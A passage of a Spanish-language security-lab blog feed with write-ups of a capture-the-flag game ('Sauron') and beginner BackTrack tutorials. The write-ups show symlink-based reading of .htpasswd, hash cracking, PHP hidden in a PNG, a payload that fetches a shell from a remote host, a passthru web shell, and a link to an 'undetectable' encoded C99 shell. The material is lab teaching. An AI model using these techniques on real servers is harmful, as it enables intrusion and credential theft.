<p><strong>echo &#8220;Options -SymLinksIfOwnerMatch +FollowSymLinks&#8221; &gt; .htaccess</strong></p>
<p>Pero como sabemos, debe ser URLEncodeada, quedando una cadena, para su ejecución en nuestra shell, como la siguiente:</p>
<p><strong>echo+%22Options+-SymLinksIfOwnerMatch+%2BFollowSymLinks%22+%3E+.htaccess</strong></p>
<p><strong>2. </strong>Ahora es cuestión de crear un enlace simbólico, sobre algún contenido que nos interese leer del directorio “intranet”. En este caso, lo más interesante es leer el fichero .htaccess de ese directorio, del que nos garantizamos su existencia, y que además nos impide el acceso al contenido web de <strong>http://intranet.blindware.inc</strong>.<br />
Creamos pues el enlace simbólico:</p>
<p style="text-align: justify;"><strong>ln –s /var/www/intranet/htdocs/.htaccess htaccess</strong></p>
<p>De esta forma, tenemos un enlace directo, en nuestro directorio <strong>http://www.blindware.inc/_controlp/htacccess</strong>, que una vez visitado nos dará el contenido del fichero:</p>
<p><strong>Options +Indexes<br />
AuthName &#8220;Blindware &#8211; Intranet Protected&#8221;<br />
AuthType Basic<br />
AuthUserFile /var/www/intranet/htdocs/.htpasswd<br />
require valid-user</strong></p>
<p><strong>3.</strong> Repetimos el proceso, una vez que conocemos la localización del fichero .htpasswd. Para ello creamos otro enlace simbólico: <strong></strong></p>
<p style="text-align: justify;"><strong>ln -s /var/www/intranet/htdocs/.htpasswd htpasswd</strong></p>
<p>De esta forma, creamos un enlace directo, en nuestro directorio <strong>http://www.blindware.inc/_controlp/htpasswd</strong>, que una vez visitado nos dará el contenido del fichero.</p>
<p><strong>admin:tCPJIYCZjtqF6</strong></p>
<p><strong>4.</strong> Tenemos el usuario, y el hash del acceso a intranet.blindware.inc, podemos bien intentar crackearlo, bien seguir intentando la lectura de ficheros contenidos en ese directorio. A priori es un hash DES tradicional, con lo cual podemos intentar romperlo, a ver qué sucede.</p>
<p>Para romper el hash, hacemos uso de la herramienta “john the ripper”, que es con diferencia el crackeador de passwords más conocido de Unix.</p>
<p><strong>$ john htpasswd</strong><br />
<strong>guesses: 1 time: 0:00:00:10 (3) c/s: 335628 trying: 132449 &#8211; 132498<br />
Loaded 1 password hash (Traditional DES [64/64 BS MMX])<br />
132456 (admin)</strong></p>
<p>Pues ya conocemos el password: 132456 con usuario admin. Lo que nos permite acceder a intranet.blindware.inc y seguir avanzando en la resolución de Sauron. Dentro de 15 días, continuaremos con el siguiente nivel.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-vi-de-viii/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (V de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-v-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-v-de-viii#comments</comments>
		<pubDate>Mon, 01 Sep 2008 17:25:04 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[Shell PHP]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=242</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la quinta entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 4 publicado por <a href="http://sg6-labs.blogspot.com/2008/02/secgame-1-sauron-resolucin-nivel-4.html" target="_blank"><strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/61331624/79bc3574/Solucionario_HackTaller_DragonJARorg.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org) &#8211; Incluye la Shell C99 codificada en base 64 &#8220;no detectable&#8221;.</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank">Shell Linux</a>/<a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">BackTrack</a>, <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> (incluido en <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">backtrack</a>-<a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a>), <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a> (en nuestro caso, <a href="http://www.hirednetwork.com/?p=138" target="_blank">C99</a>)<a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank"><br />
</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank"></a> <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> &#8211; <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> &#8211; <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> &#8211; <a href="http://www.tips.cl/viewtopic.php?p=52&amp;sid=4c922498c6ef26b0056db3390cb08fa8" target="_blank">Comando CAT</a>, <a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank">Shell</a>, <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a>, <a href="http://ha.ckers.org/blog/20060914/php-vulnerable-to-null-byte-injection/" target="_blank">Null Byte Injection</a></p>
<p style="text-align: justify;"><span id="more-242"></span><strong>Este es el aspecto que presenta el nivel 4. Dividido en 4 secciones:</strong></p>
<ul>
<li>Información sobre el sistema</li>
<li>Administración de MySQL mediante MySQL Admin</li>
<li>Visualización de Estadísticas</li>
<li>Cambio de parámetros</li>
</ul>
<p style="text-align: justify;">Sobre la visualización de estadísticas, poco hay que comentar. Ya nos es familiar porque ya hemos accedido a ella, pero desde otro lugar, durante el nivel 2, por tanto no aporta nada a lo que ya conocemos.</p>
<p>Luego existen 2 partes que contienen aplicaciones públicas, por un lado tenemos phpSysInfo, y por otro phpMyAdmin. En la idea original de este juego está el que no sea necesario el uso de fallos en aplicativos públicos para superarlo, siendo así por un motivo bien sencillo: con el paso del tiempo uno o todos los aplicativos que existen instalados en la máquina virtual serán susceptibles de fallos.</p>
<p>No obstante, podemos evaluar la seguridad de estas versiones, y ver que no parecen existir exploits públicos relevantes para las mismas. Existe un XSS en phpSysInfo, poco relevante para una explotación efectiva, al igual que otro en phpMyAdmin. Comentar como apunte que el hecho de que a fecha de hoy no parezcan existir ataques relevantes no quiere decir, evidentemente, que en un futuro no puedan aparecer, e incluso, y dado que son aplicaciones de código abierto, una vez agotadas el resto de vías, es posible que una revisión exhaustiva de su código fuente, y de su ejecución, pueda revelarnos fallos de seguridad no públicos.</p>
<p>Sin embargo, en el caso que nos ocupa, antes de llegar a la revisión de código público, hay que percatarse de la sección &#8220;Cambio de parámetros&#8221; la cual permite la subida de un fichero al servidor. Ésta *siempre* es una función crítica y debe ser evaluado su riesgo, ya que permitirá al atacante subir algún tipo de contenido a nuestro sistema.</p>
<p>Para el caso que nos ocupa, podemos darnos cuenta que la robustez y codificación de la subida de imágenes es la apropiada:</p>
<ul>
<li>Únicamente permite ficheros con extensión PNG</li>
<li>El tamaño del fichero está limitado a 8KB</li>
<li>El contenido del fichero debe corresponder con una imagen PNG</li>
</ul>
<p style="text-align: justify;">Esto hace que no podamos subir un fichero renombrado como .PNG, sino que debamos subir un gráfico PNG, limitado a 8KB, y con extensión PNG. Por tanto, a priori, podemos pensar que no existe posibilidad alguna de explotar ningún fallo. Bien, veremos que no es así.</p>
<p>Lo primero que debemos plantearnos es: ¿en una imagen PNG únicamente puede existir eso?. La respuesta es que no. Nada más sencillo que concatenar al final de un fichero PNG, código ejecutable en formato PHP. Para ello, a partir de una imagen PNG de menos de 8KB y válida para subirla al servidor, hacemos lo siguiente:</p>
<p><strong>$ cat &gt;&gt; img.png<br />
&lt;? phpinfo(); ?&gt;</strong></p>
<p>Para los no familiarizados con UNIX, decir que simplemente hemos añadido al final del fichero ese código PHP. Una vez hecho esto, tendremos un fichero válido, en formato PNG, que contiene al final del mismo un código PHP. Este fichero podrá ser subido al servidor.</p>
<p>¿Y ahora qué?. Ahora queda percatarse de un par de detalles importantes. El primero, ¿cómo se llama el fichero que contiene la imagen?. En este caso, el fichero de imagen es: <strong>http://www.blindware.inc/_controlp/image.php</strong>, o dicho de otra forma, un fichero PHP se encarga de servir la imagen, de la que aún desconocemos su nombre y ubicación. ¿Cómo podemos saberla?. Pues haciendo uso del error que vimos en el nivel 3 dentro del fichero index.php, que permitía la lectura de ficheros. Con ese error leemos el contenido de image.php:</p>
<p><strong>&lt;? header(&#8220;Content-Type: image/png&#8221;); readfile(&#8220;01.png&#8221;); ?&gt;</strong></p>
<p>Por tanto, nuestro fichero subido sabemos que se llama &#8220;01.png&#8221; y que se encuentra en el mismo directorio de <strong>/_controlp/</strong> que el resto de datos. ¿Cómo podemos explotar el fichero con contenido PHP?. En este caso concreto, es cuando se puede apreciar, como la subida de ficheros maximiza el riesgo de otro de los fallos encontrados en el nivel 3. Si recordamos además de leer ficheros mediante el error localizado en index.php, podemos incluir ficheros para ser procesados por PHP desde un error con idéntica explotación localizado en login.php. Al hacerlo obtenemos como resultado de incluir nuestro fichero 01.png manipulado lo siguiente:</p>
<p>Como vemos, el contenido de la instrucción phpinfo() se muestra a continuación de los datos contenidos en la imagen. Esta información puede ser poco relevante, pero para la explotación efectiva únicamente hay que construir un exploit ligeramente más elaborado, que bien pudiera ser el que vamos a comentar a continuación.</p>
<p>El objetivo del exploit es conseguir crear una shell en PHP dentro de esta máquina. Para ello, el código que proponemos incluir dentro de la imagen es el siguiente:</p>
<p><strong>&lt;? copy(“http://ip/shell.txt”,”shell.php”); ?&gt;</strong></p>
<p>Vaya por delante que la explotación se puede realizar de muchas maneras. Nosotros por elegancia, siempre proponemos que el código a incluir en el exploit sea mínimo. En este caso, el exploit únicamente copia una shell remota localizada en shell.txt al servidor victima.</p>
<p>El contenido de shell.txt puede ser el siguiente:</p>
<p><strong>&lt;?<br />
header(“Content-Type: text/plain”);<br />
passthru($_GET[“cmd”);<br />
?&gt;</strong></p>
<p>El objetivo de este script es ejecutar el comando que pasemos como parámetr en la variable &#8220;cmd&#8221;. De tal forma, si ahora subimos la imagen con el primer código al servidor, y colocamos en la IP de un servidor web que usemos para el ataque el fichero “shell.txt”, debemos conseguir que este se copie al servidor y acceder a él desde la dirección http://www.blindware.inc/_controlp/shell.php</p>
<p>Aquí aparece un problema. Al acceder a esa URL veremos que no aparece nada, y es que hay un detalle importante siempre que subamos contenido ejecutable a un servidor. A priori no sabemos qué permisos serán necesarios para su ejecución, y la función copy lo más probable es que haya creado un fichero con permisos 644. Para ello podemos verificar qué permisos tienen los ficheros php de los que conocemos su existencia. En este caso los ficheros deben tener permisos 755. Por ello tenemos que modificar ligeramente el exploit a incluir dentro del fichero PNG al siguiente:</p>
<p><strong>&lt;? copy(“http://ip/shell.txt”,”shell.php”); chmod(“shell.php”,0755); ?&gt;</strong></p>
<p><strong>Nota:</strong> importante colocar un 0 delante del 755, sino no conseguiremos los permisos rwxr-xr-x</p>
<p>Hecho esto, tendremos acceso al sistema de forma remota y habremos superado el nivel, como muestran las siguientes URLs:</p>
<p><strong>http://www.blindware.inc/_controlp/shell.php?cmd=uname%20-a<br />
Linux sauron 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux</strong></p>
<p><strong>http://www.blindware.inc/_controlp/shell.php?cmd=id<br />
uid=500(blindware) gid=500(blindware) groups=500(blindware)</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-v-de-viii/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, servicios básicos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos#comments</comments>
		<pubDate>Thu, 28 Aug 2008 16:14:25 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Servicios]]></category>
		<category><![CDATA[SSH]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[TFTP]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[VNC]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=226</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">BackTrack incluye algunos servicios de red por defecto, entre ellos HTTPD, SSHD, TFTP, VNC SERVER, etc. Estos servicios pueden ser utilizados en diferentes situaciones en un Test de Penetración (conexión remota a un equipo, transferencia de archivos, etc).</p>
<p style="text-align: justify;"><strong>Objetivos del laboratorio:</strong></p>
<ol style="text-align: justify;">
<li>Familiarizarse con la suite de herramientas incluídas en BackTrack.</li>
<li>Cambiar la contrseña que viene por defecto en BackTrack.</li>
<li>Conocer los direferentes servicios disponibles en BackTrack (básicos).</li>
<li>Configurar y poner en marcha los servicios básicos de BackTrack.</li>
<li>Comprobar la disponibilidad de los servicios básicos de BackTrack.</li>
<li>Realizar pruebas de conexión a los servicios de BackTrack.</li>
</ol>
<p style="text-align: justify;"><span id="more-226"></span>Veamos como iniciar con backtrack</p>
<p style="text-align: justify;">Sistema de <a href="http://es.wikipedia.org/wiki/Booteo" target="_blank"><strong>booteo</strong></a> de BackTrack</p>
<p style="text-align: justify;"><a href="http://img125.imageshack.us/img125/1193/10lu0.jpg" target="_blank"><img src="http://img125.imageshack.us/img125/1193/10lu0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Termina de reconocer y configurar algunos de los dispositivos físicos, luego de cargar estos dispositivos nos ofrece una pantalla de bienvenida, con información de configuración, además de una pantalla de <a href="http://es.wikipedia.org/wiki/Login" target="_blank"><strong>login</strong></a>. La pantalla nos invita a configurar nuestro sistema con algunos comandos, después de logearnos como root.</p>
<p style="text-align: justify;"><a href="http://img223.imageshack.us/img223/7536/11od8.jpg" target="_blank"><img src="http://img223.imageshack.us/img223/7536/11od8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Para logearnos en el sistema ingresamos:<br />
usuario: <strong>root</strong><br />
contraseña: <strong>toor</strong></p>
<p style="text-align: justify;"><a href="http://img204.imageshack.us/img204/2664/12oo4.jpg" target="_blank"><img src="http://img204.imageshack.us/img204/2664/12oo4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Si desde el comienzo seleccionamos la opción de acceso a la red mediante NAT (VMWare), podemos observar gracias al comando <a href="http://es.wikipedia.org/wiki/Ifconfig" target="_blank"><strong>ifconfig</strong></a> nuestras interfaces de red.</p>
<p style="text-align: justify;"><a href="http://img106.imageshack.us/img106/7615/13ab6.jpg" target="_blank"><img src="http://img106.imageshack.us/img106/7615/13ab6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Luego podemos configurar el entorno gráfico (xconf) y cargarlo mediante el comando <a href="http://es.tldp.org/FAQ/FAQ_Linux/Html/FAQ_Linux-6.html" target="_blank"><strong>startx<br />
</strong></a> ó Flux (según nuestras preferencias de uso)</p>
<p style="text-align: justify;"><a href="http://img130.imageshack.us/img130/4568/14jg6.jpg" target="_blank"><img src="http://img130.imageshack.us/img130/4568/14jg6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Entorno gráfico cargando.</p>
<p style="text-align: justify;"><a href="http://img230.imageshack.us/img230/7319/15bw9.jpg" target="_blank"><img src="http://img230.imageshack.us/img230/7319/15bw9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>BackTrack cargado como Live CD en su totalidad.</p>
<p style="text-align: justify;"><a href="http://img124.imageshack.us/img124/4858/31hm3.jpg" target="_blank"><img src="http://img124.imageshack.us/img124/4858/31hm3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Es importante destacar que el éxito de BackTrack reside en la excelente organización y disposición por grupos de herramientas:</p>
<ol style="text-align: justify;">
<li>Recolección de información</li>
<li>Mapeo de red</li>
<li>Identificación de vulnerabilidades</li>
<li>Penetración / Explotación</li>
<li>Escalada de privilegios</li>
<li>Mantenimiento del acceso</li>
<li>Servicios de red inalámbrica</li>
<li>Telefonía sobre VoIP</li>
<li>Informática Forense</li>
<li>Ingeniería inversa</li>
</ol>
<p style="text-align: justify;">También  podemos ingresar a los diferentes grupos de herramientas desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>cd /pentest/</strong></p>
<p style="text-align: justify;"><a href="http://img172.imageshack.us/img172/9676/75183728mt7.jpg"><img src="http://img172.imageshack.us/img172/9676/75183728mt7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Uno de los primero pasos a realizar debe ser el cambio de contraseña que viene por defecto en backtrack, para ello bastará con ejecutar la siguiente instrucción en la línea de comandos:</p>
<p style="text-align: justify;"><strong>passwd</strong></p>
<p style="text-align: justify;">y seguir las instrucciones para completar el cambio</p>
<p><a href="http://img165.imageshack.us/img165/9905/52389028kw9.jpg"><img src="http://img165.imageshack.us/img165/9905/52389028kw9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Veremos ahora como identificar y habilitar servicios básicos en backtrack</p>
<p style="text-align: justify;"><strong>SSH (Secure Shell)</strong></p>
<p style="text-align: justify;">Empecemos por generar y habilitar el servicio de conexiones seguras (SSHD &#8211; Secure Shell Daemon), para ello y desde la línea de comandos ejecutamos la siguiente sintáxis</p>
<p style="text-align: justify;"><strong>sshd-generate</strong></p>
<p><a href="http://img381.imageshack.us/img381/7827/80769068hf2.jpg"><img src="http://img381.imageshack.us/img381/7827/80769068hf2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Una vez generado nuestro servicio, iniciaremos el mismo como conexión segura:</p>
<p style="text-align: justify;"><strong>/usr/sbin/sshd</strong></p>
<p><a href="http://img136.imageshack.us/img136/6959/20870314mr8.jpg"><img src="http://img136.imageshack.us/img136/6959/20870314mr8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora, si deseamos comprobar la disponibilidad del servicio de conexiones seguras, basta con ejecutar el siguiente comando para mostrar las conexiones activas y a la escucha en nuestra máquina (para este caso solo consultamos para el puerto 22, puerto usado generalmente para este tipo de conexiones):</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 22</strong></p>
<p><a href="http://img514.imageshack.us/img514/6458/99595389wj2.jpg"><img src="http://img514.imageshack.us/img514/6458/99595389wj2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Podemos hacer una prueba de conexión desde otro sistema, veamos:</p>
<p><a href="http://img257.imageshack.us/img257/2950/38574624hz7.jpg"><img src="http://img257.imageshack.us/img257/2950/38574624hz7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; Servidor Apache &#8212;<br />
</strong></p>
<p style="text-align: justify;">BackTrack incluye por defecto una instalación del servidor Web Apache, veamos como ponerlo en marcha.</p>
<p style="text-align: justify;"><strong>Nota:</strong> Cabe aclarar que la mayoría de estos servicios pueden ser ejecutados desde el menu incluído en K-Menú, Servicios. Solo estamos viendo otros métodos en caso de que lo queremos hacer o bien sea, más rápido, ó cuando no tengamos disponible el entorno gráfico.</p>
<p style="text-align: justify;">Pongamos en marcha el servicio de apache desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>apachectl start</strong></p>
<p style="text-align: justify;">Y comprobemos la disponiblidad del servicio</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 80</strong></p>
<p><a href="http://img165.imageshack.us/img165/148/99192940en1.jpg"><img src="http://img165.imageshack.us/img165/148/99192940en1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora desde un navegador Web</p>
<p><a href="http://img413.imageshack.us/img413/3131/52594955jp8.jpg"><img src="http://img413.imageshack.us/img413/3131/52594955jp8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Para detener el servicio solo basta ejecutar la instrucción stop.</p>
<p style="text-align: justify;"><strong>apachectl stop</strong></p>
<p><a href="http://img98.imageshack.us/img98/2964/85170941ku3.jpg"><img src="http://img98.imageshack.us/img98/2964/85170941ku3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; TFTP (Trivial File Transfer Protocol &#8211; Protocolo de transferencia de archivos trivial) &#8212;<br />
</strong></p>
<p style="text-align: justify;">Veamos como poner en marcha el servidor TFTP que incluye por defecto el S.O BackTrack.</p>
<p style="text-align: justify;">Desde la línea de comandos ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>atftpd &#8211;daemon &#8211;port 69 /tap/</strong></p>
<p><a href="http://img222.imageshack.us/img222/2558/10pt0.jpg"><img src="http://img222.imageshack.us/img222/2558/10pt0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora comprobemos la disponiblidad del servicio</p>
<p style="text-align: justify;"><strong>netstat -anu|grep 69</strong></p>
<p><a href="http://img257.imageshack.us/img257/8765/11fd3.jpg"><img src="http://img257.imageshack.us/img257/8765/11fd3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Hagamos una prueba de transferencia de archivos</p>
<p><a href="http://img54.imageshack.us/img54/6685/14ih6.jpg"><img src="http://img54.imageshack.us/img54/6685/14ih6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; VNC &#8212;<br />
</strong></p>
<p style="text-align: justify;">Veamos como configurar y poner en marcha nuestro propio servicio de VNC en BackTrack, para ello ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>vncserver</strong></p>
<p style="text-align: justify;">Solo tenemos que seguir las intrucciones en pantalla (definir contraseña de acceso)</p>
<p><a href="http://img165.imageshack.us/img165/2155/12eo7.jpg"><img src="http://img165.imageshack.us/img165/2155/12eo7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Verifiquemos que nuestra máquina realmente está a la escucha de nuevas conexiones, para ello ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 590</strong></p>
<p><a href="http://img98.imageshack.us/img98/1725/13km7.jpg"><img src="http://img98.imageshack.us/img98/1725/13km7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora hagamos una prueba de conexión desde otra máquina</p>
<p><a href="http://img237.imageshack.us/img237/9662/vnc1wq0.jpg"><img src="http://img237.imageshack.us/img237/9662/vnc1wq0.th.jpg" alt="" /></a></p>
<p><a href="http://img185.imageshack.us/img185/9515/vnc2cq1.jpg"><img src="http://img185.imageshack.us/img185/9515/vnc2cq1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Aquí termina el laboratorio sobre habilitación, configuración y prueba de servicios básicos en BackTrack. Estos mismo servicios pueden ser habilitados de manera gráfica en el propio menú K de BackTrack, además pueden ser encontrados algunos otros instalados por defecto en el sistema, esta será la práctica para cada uno de los seguidores de los laboratorios, espero que sean enviadas las capturas de pantallas, además de los comentarios sobre el mismo.</p>
<p style="text-align: justify;">
<p style="text-align: justify;">
<p style="text-align: justify;"><strong>Palabras clave:</strong><a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank"><br />
Apache</a>, <a href="http://es.wikipedia.org/wiki/VNC" target="_blank">VNC</a>, <a href="http://es.wikipedia.org/wiki/TFTP" target="_blank">TFTP</a>, <a href="http://es.wikipedia.org/wiki/SSH" target="_blank">SSH</a>, <a href="http://www.kriptopolis.org/backtrack" target="_blank">BackTrack</a>, <a href="http://es.wikipedia.org/wiki/Arranque" target="_blank">Booteo</a>, <a href="http://es.wikipedia.org/wiki/NAT" target="_blank">NAT</a>, <a href="http://es.wikipedia.org/wiki/VMware" target="_blank">VMWare</a></p>
<p style="text-align: justify;"><strong>Nota:</strong><br />
Este nuevo recurso está basado en el sistema de entrenamiento ofrecido por los desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) <a href="http://www.offensive-security.com/" target="_blank">Offensive-security.com</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Conceptos básicos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos#comments</comments>
		<pubDate>Mon, 25 Aug 2008 18:22:40 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=215</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>BackTrack</strong><br />
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.<br />
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.</p>
<p style="text-align: justify;"><span id="more-215"></span>Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org<br />
<a href="http://www.remote-exploit.org/backtrack.html" target="_blank"><strong>Web Oficial de BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://backtrack.offensive-security.com/index.php?title=Tools" target="_blank"><strong>Lista de herramientas incluídas en BackTrack</strong></a></p>
<p style="text-align: justify;">El proceso de instalación o puesta en marcha de este LiveCD es un tema que ya ha sido cubierto en diferentes ocasiones en Labs DragonJAR. Veamos algunos enlaces de como llevar a cabo este procedimiento:</p>
<p style="text-align: justify;"><a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-i" target="_blank"><strong>Ejecución / Instalación de BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://www.dragonjar.org/backtrack-portable.xhtml" target="_blank"><strong>BackTrack Portable</strong></a></p>
<p style="text-align: justify;"><a href="http://hwagm.elhacker.net/htm/backtrack.htm" target="_blank"><strong>Instalar Back | Track en el HD de tú PC</strong></a></p>
<p style="text-align: justify;"><a href="http://www.kriptopolis.org/backtrack-usb" target="_blank"><strong>Instalar BackTrack en una llave USB</strong></a></p>
<p style="text-align: justify;"><a href="http://www.kriptopolis.org/backtrack" target="_blank"><strong>Review BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://kernelpanic.org.mx/2008/07/como-instalar-backtrack-3/" target="_blank"><strong>Como Instalar Back|Track 3</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Contenido y Recursos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos#comments</comments>
		<pubDate>Mon, 25 Aug 2008 15:59:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[ARP]]></category>
		<category><![CDATA[fuzzing]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Redirección]]></category>
		<category><![CDATA[spoofing]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[Troyanos]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=211</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Para este nuevo recurso se hacen necesarios los siguiente elementos:</p>
<ol style="text-align: justify;">
